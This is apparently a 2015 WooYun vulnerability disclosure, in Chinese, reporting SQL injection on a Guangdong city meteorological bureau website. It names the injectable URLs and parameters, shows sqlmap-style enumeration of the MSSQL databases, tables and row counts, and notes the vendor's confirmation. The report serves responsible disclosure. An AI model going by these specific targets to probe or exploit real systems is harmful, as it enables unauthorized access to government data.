当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089685

漏洞标题:广东省某市气象局存在多处SQL注射,可命令执行

相关厂商:广东省信息安全测评中心

漏洞作者: Yang

提交时间:2015-01-04 14:22

修复时间:2015-02-18 14:24

公开时间:2015-02-18 14:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-16: 细节向核心白帽子及相关领域专家公开
2015-01-26: 细节向普通白帽子公开
2015-02-05: 细节向实习白帽子公开
2015-02-18: 细节向公众公开

简要描述:

广东省某市气象局存在多处SQL注射,可命令执行

详细说明:

http://www.fs121.com/notesInfo.aspx?c=0304&id=1147 c=0304 可能存在sql注入漏洞
http://www.fs121.com/yxsm_Index.aspx?m=proxy&a=show&q_url= q_url= 可能存在sql注入漏洞
http://www.fs121.com/yingxiang.aspx?aciton=sx&eTime=&sTime=&sortType=u eTime= 可能存在sql注入漏洞
http://www.fs121.com/qxkpwd.aspx?code=080402 可能存在sql注入漏洞
http://www.fs121.com/weather/focn.aspx?T=map&cid= cid= 可能存在sql注入漏洞
http://www.fs121.com/%22AwshourfRain.aspx?sid= 可能存在sql注入漏洞
http://www.fs121.com/VISLine.aspx?t=1&n= n= 可能存在sql注入漏洞
好多参数。建议全站检查
这么晚了。而且又是元旦,我就演示一处

漏洞证明:

1.png


back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] foshanqixiangju
[*] master
[*] model
[*] msdb
[*] tempdb


跑了一个库

Database: foshanqixiangju
[37 tables]
+-------------------------+
| Bs_Ad                   |
| Bs_AdKind               |
| Bs_GetPwd               |
| Bs_Links                |
| Bs_LinksKind            |
| Bs_Msg                  |
| Bs_News                 |
| Bs_NewsAlbums           |
| Bs_NewsKind             |
| Bs_SendLog              |
| Bs_Station              |
| Bs_Subscribe            |
| Bs_Template             |
| Bs_TemplateKind         |
| Bs_User                 |
| Bs_UserGrade            |
| Bs_Weather              |
| Bs_WeatherKind          |
| Bs_WeatherSubscribe_log |
| Bs_Wind8                |
| Bs_video                |
| Sy_Code                 |
| Sy_Config               |
| Sy_Control              |
| Sy_Log                  |
| Sy_Login                |
| Sy_Menu                 |
| Sy_Ou                   |
| Sy_Role                 |
| Sy_RoleCtrl             |
| Sy_RoleMnu              |
| Sy_User                 |
| Sy_UserRole             |
| bs_WeatherSubscribe     |
| bs_sta_fsaws            |
| bs_sta_fsvis            |
| dtproperties            |
+-------------------------+


Database: foshanqixiangju
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| dbo.Bs_News                 | 100139  |
| dbo.Bs_Station              | 20956   |
| dbo.Sy_Log                  | 1443    |
| dbo.Bs_Wind8                | 361     |
| dbo.Bs_WeatherSubscribe_log | 336     |
| dbo.Sy_RoleMnu              | 244     |
| dbo.Sy_Login                | 218     |
| dbo.bs_sta_fsaws            | 177     |
| dbo.Bs_NewsKind             | 101     |
| dbo.Sy_Menu                 | 100     |
| dbo.Bs_Msg                  | 91      |
| dbo.Bs_video                | 81      |
| dbo.bs_sta_fsvis            | 47      |
| dbo.Bs_Ad                   | 29      |
| dbo.Bs_Links                | 20      |
| dbo.Bs_AdKind               | 11      |
| dbo.bs_WeatherSubscribe     | 11      |
| dbo.Sy_UserRole             | 11      |
| dbo.Bs_WeatherKind          | 10      |
| dbo.Bs_Weather              | 8       |
| dbo.Bs_LinksKind            | 7       |
| dbo.Bs_NewsAlbums           | 6       |
| dbo.Sy_Role                 | 6       |
| dbo.Sy_User                 | 5       |
| dbo.Sy_Code                 | 4       |
| dbo.Bs_TemplateKind         | 2       |
| dbo.Sy_Ou                   | 2       |
| dbo.Sy_Config               | 1       |
| dbo.Sy_RoleCtrl             | 1       |
+-----------------------------+---------+


命令执行:

1.png


不知道为何回显不出。。可能我不会,才学

修复方案:

版权声明:转载请注明来源 Yang@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-06 11:37

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:15
正在联系相关网站管理单位处置。

最新状态:

暂无